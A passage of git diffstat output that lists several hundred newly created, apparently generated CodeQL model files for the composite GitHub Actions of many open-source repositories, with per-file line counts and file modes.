.../jhipster_generator-jhipster.model.yml | 22 +++++++++++++++++++ .../jsocol_django-ratelimit.model.yml | 6 +++++ .../juicedata_juicefs.model.yml | 12 ++++++++++ .../jupyter_docker-stacks.model.yml | 8 +++++++ .../keycloak_keycloak.model.yml | 8 +++++++ .../composite-actions/kserve_kserve.model.yml | 8 +++++++ .../kubeflow_katib.model.yml | 10 +++++++++ .../kubeflow_training-operator.model.yml | 6 +++++ .../kubernetes-sigs_karpenter.model.yml | 6 +++++ .../kubernetes-sigs_kwok.model.yml | 6 +++++ .../kubescape_kubescape.model.yml | 7 ++++++ .../kubeshop_botkube.model.yml | 7 ++++++ .../kyverno_kyverno.model.yml | 8 +++++++ .../composite-actions/lancedb_lance.model.yml | 9 ++++++++ .../launchdarkly_ios-client-sdk.model.yml | 6 +++++ .../layer5labs_meshmap-snapshot.model.yml | 11 ++++++++++ .../ldc-developers_ldc.model.yml | 15 +++++++++++++ .../ledgerhq_ledger-live.model.yml | 8 +++++++ .../composite-actions/lerna_lerna.model.yml | 6 +++++ .../composite-actions/lf-edge_eve.model.yml | 8 +++++++ .../libgit2_libgit2.model.yml | 12 ++++++++++ .../lightning-ai_pytorch-lightning.model.yml | 13 +++++++++++ .../lightning-ai_torchmetrics.model.yml | 8 +++++++ .../linkerd_linkerd2.model.yml | 9 ++++++++ .../logseq_publish-spa.model.yml | 9 ++++++++ .../macvim-dev_macvim.model.yml | 7 ++++++ .../mamba-org_mamba.model.yml | 8 +++++++ .../maplibre_maplibre-native.model.yml | 16 ++++++++++++++ .../mastodon_mastodon.model.yml | 6 +++++ .../mavlink_qgroundcontrol.model.yml | 8 +++++++ .../mdanalysis_mdanalysis.model.yml | 13 +++++++++++ .../medic_cht-core.model.yml | 8 +++++++ .../medusajs_medusa.model.yml | 8 +++++++ .../metabase_metabase.model.yml | 17 ++++++++++++++ ...etamask_action-create-release-pr.model.yml | 8 +++++++ .../metamask_action-npm-publish.model.yml | 6 +++++ .../microsoft_fluentui.model.yml | 6 +++++ .../microsoft_playwright.model.yml | 11 ++++++++++ .../composite-actions/microsoft_wsl.model.yml | 7 ++++++ .../milvus-io_milvus.model.yml | 6 +++++ .../composite-actions/mlflow_mlflow.model.yml | 6 +++++ .../modin-project_modin.model.yml | 8 +++++++ .../mozilla_addons-server.model.yml | 7 ++++++ .../mozilla_bedrock.model.yml | 6 +++++ .../mozilla_sccache.model.yml | 6 +++++ .../msys2_setup-msys2.model.yml | 6 +++++ .../mumble-voip_mumble.model.yml | 8 +++++++ .../composite-actions/nasa_fprime.model.yml | 6 +++++ .../nats-io_nats-server.model.yml | 8 +++++++ ..._optic-release-automation-action.model.yml | 8 +++++++ .../composite-actions/nektos_act.model.yml | 12 ++++++++++ ...4j-contrib_neo4j-apoc-procedures.model.yml | 7 ++++++ .../neondatabase_neon.model.yml | 13 +++++++++++ .../composite-actions/neovim_neovim.model.yml | 6 +++++ .../composite-actions/nhost_nhost.model.yml | 6 +++++ .../nix-community_nixos-wsl.model.yml | 7 ++++++ .../composite-actions/novuhq_novu.model.yml | 6 +++++ .../composite-actions/nymtech_nym.model.yml | 6 +++++ .../obsproject_obs-studio.model.yml | 19 ++++++++++++++++ .../composite-actions/ocaml_dune.model.yml | 10 +++++++++ .../oneflow-inc_oneflow.model.yml | 12 ++++++++++ ...metry_opentelemetry-ruby-contrib.model.yml | 8 +++++++ ...pen-telemetry_opentelemetry-ruby.model.yml | 7 ++++++ .../open-watcom_open-watcom-v2.model.yml | 8 +++++++ .../openapitools_openapi-generator.model.yml | 8 +++++++ .../composite-actions/openjdk_jdk.model.yml | 6 +++++ ...pensearch-project_opensearch-net.model.yml | 8 +++++++ .../opensearch-project_security.model.yml | 6 +++++ .../opentrons_opentrons.model.yml | 12 ++++++++++ .../openvinotoolkit_openvino.model.yml | 16 ++++++++++++++ ...enzeppelin-contracts-upgradeable.model.yml | 12 ++++++++++ ...nzeppelin_openzeppelin-contracts.model.yml | 12 ++++++++++ .../composite-actions/oppia_oppia.model.yml | 6 +++++ .../composite-actions/oracle_graal.model.yml | 7 ++++++ .../oracle_truffleruby.model.yml | 6 +++++ .../orhun_git-cliff.model.yml | 6 +++++ .../composite-actions/oven-sh_bun.model.yml | 7 ++++++ .../owntracks_android.model.yml | 7 ++++++ .../pandas-dev_pandas.model.yml | 8 +++++++ .../pardeike_harmony.model.yml | 9 ++++++++ .../pennylaneai_pennylane.model.yml | 7 ++++++ .../phalcon_cphalcon.model.yml | 13 +++++++++++ .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++ .../composite-actions/php_php-src.model.yml | 10 +++++++++ .../phpdocumentor_phpdocumentor.model.yml | 7 ++++++ ...necone-io_pinecone-python-client.model.yml | 10 +++++++++ .../composite-actions/pixijs_pixijs.model.yml | 6 +++++ .../posthog_posthog.model.yml | 7 ++++++ .../composite-actions/primer_react.model.yml | 7 ++++++ .../project-chip_connectedhomeip.model.yml | 8 +++++++ .../projectnessie_nessie.model.yml | 9 ++++++++ .../composite-actions/psf_black.model.yml | 6 +++++ .../pyca_cryptography.model.yml | 6 +++++ .../pyg-team_pytorch_geometric.model.yml | 8 +++++++ .../python-poetry_poetry.model.yml | 6 +++++ .../composite-actions/python_mypy.model.yml | 7 ++++++ .../quarto-dev_quarto-cli.model.yml | 15 +++++++++++++ .../composite-actions/quay_clair.model.yml | 11 ++++++++++ .../quickwit-oss_quickwit.model.yml | 7 ++++++ .../composite-actions/r-lib_actions.model.yml | 18 +++++++++++++++ .../randombit_botan.model.yml | 7 ++++++ .../raspberrypi_documentation.model.yml | 12 ++++++++++ .../ray-project_kuberay.model.yml | 6 +++++ .../readthedocs_actions.model.yml | 10 +++++++++ .../reflex-dev_reflex.model.yml | 6 +++++ .../renovatebot_renovate.model.yml | 6 +++++ .../rethinkdb_rethinkdb.model.yml | 9 ++++++++ .../composite-actions/risc0_risc0.model.yml | 9 ++++++++ .../rocketchat_rocket.chat.model.yml | 9 ++++++++ .../composite-actions/rook_rook.model.yml | 9 ++++++++ .../composite-actions/roots_trellis.model.yml | 6 +++++ .../composite-actions/ruby_debug.model.yml | 6 +++++ .../composite-actions/ruby_ruby.model.yml | 10 +++++++++ .../composite-actions/rusefi_rusefi.model.yml | 10 +++++++++ .../saltstack_salt.model.yml | 14 ++++++++++++ .../sap_sapmachine.model.yml | 6 +++++ .../scala-native_scala-native.model.yml | 7 ++++++ .../composite-actions/scitools_iris.model.yml | 8 +++++++ .../scylladb_scylla-operator.model.yml | 9 ++++++++ .../shader-slang_slang.model.yml | 10 +++++++++ .../shaka-project_shaka-player.model.yml | 9 ++++++++ ...ode_react-webpack-rails-tutorial.model.yml | 7 ++++++ .../simple-icons_simple-icons.model.yml | 6 +++++ .../slint-ui_slint.model.yml | 7 ++++++ .../solidusio_solidus.model.yml | 9 ++++++++ .../composite-actions/solo-io_gloo.model.yml | 6 +++++ .../composite-actions/sonarr_sonarr.model.yml | 12 ++++++++++ .../sonic-pi-net_sonic-pi.model.yml | 8 +++++++ .../spacedriveapp_spacedrive.model.yml | 6 +++++ .../spockframework_spock.model.yml | 6 +++++ .../spring-io_initializr.model.yml | 7 ++++++ .../spring-io_start.spring.io.model.yml | 7 ++++++ .../spring-projects_spring-boot.model.yml | 7 ++++++ ...spring-projects_spring-framework.model.yml | 7 ++++++ .../spring-projects_spring-graphql.model.yml | 7 ++++++ .../square_workflow-kotlin.model.yml | 8 +++++++ .../stefanprodan_podinfo.model.yml | 7 ++++++ .../composite-actions/stellar_go.model.yml | 6 +++++ .../streetsidesoftware_cspell.model.yml | 6 +++++ .../subquery_subql.model.yml | 6 +++++ .../swagger-api_swagger-codegen.model.yml | 11 ++++++++++ .../swagger-api_swagger-parser.model.yml | 11 ++++++++++ .../tarantool_tarantool.model.yml | 9 ++++++++ .../telepresenceio_telepresence.model.yml | 6 +++++ .../tensorflow_datasets.model.yml | 7 ++++++ .../texstudio-org_texstudio.model.yml | 6 +++++ .../toeverything_affine.model.yml | 13 +++++++++++ .../treeverse_lakefs.model.yml | 8 +++++++ .../trezor_trezor-firmware.model.yml | 9 ++++++++ .../tribler_tribler.model.yml | 10 +++++++++ .../trunk-io_trunk-action.model.yml | 13 +++++++++++ .../composite-actions/unidata_metpy.model.yml | 6 +++++ .../unstructured-io_unstructured.model.yml | 6 +++++ .../composite-actions/vercel_turbo.model.yml | 6 +++++ .../vesoft-inc_nebula.model.yml | 12 ++++++++++ .../composite-actions/vkcom_vkui.model.yml | 11 ++++++++++ .../vuetifyjs_vuetify.model.yml | 9 ++++++++ .../wagoodman_dive.model.yml | 6 +++++ ...lletconnect_walletconnectswiftv2.model.yml | 13 +++++++++++ .../composite-actions/wazuh_wazuh.model.yml | 8 +++++++ .../web-infra-dev_rspack.model.yml | 8 +++++++ .../webassembly_wabt.model.yml | 6 +++++ .../composite-actions/wntrblm_nox.model.yml | 6 +++++ .../composite-actions/xrplf_rippled.model.yml | 8 +++++++ .../composite-actions/zcash_zcash.model.yml | 7 ++++++ .../zenml-io_zenml.model.yml | 6 +++++ .../composite-actions/zeroc-ice_ice.model.yml | 7 ++++++ 315 files changed, 2594 insertions(+) create mode 100644 ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_grype.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_syft.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_awx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_brpc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_opendal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pekko.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_superset.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armbian_build.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/badges_shields.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coder_coder.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/discourse_.github.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emberjs_data.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/erlang_otp.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_flow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/google_dagger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/grote_transportr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/infracost_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_graal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/owntracks_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/php_php-src.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/primer_react.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/psf_black.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python_mypy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quay_clair.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/randombit_botan.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rook_rook.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/roots_trellis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_debug.model.yml create mode 100644 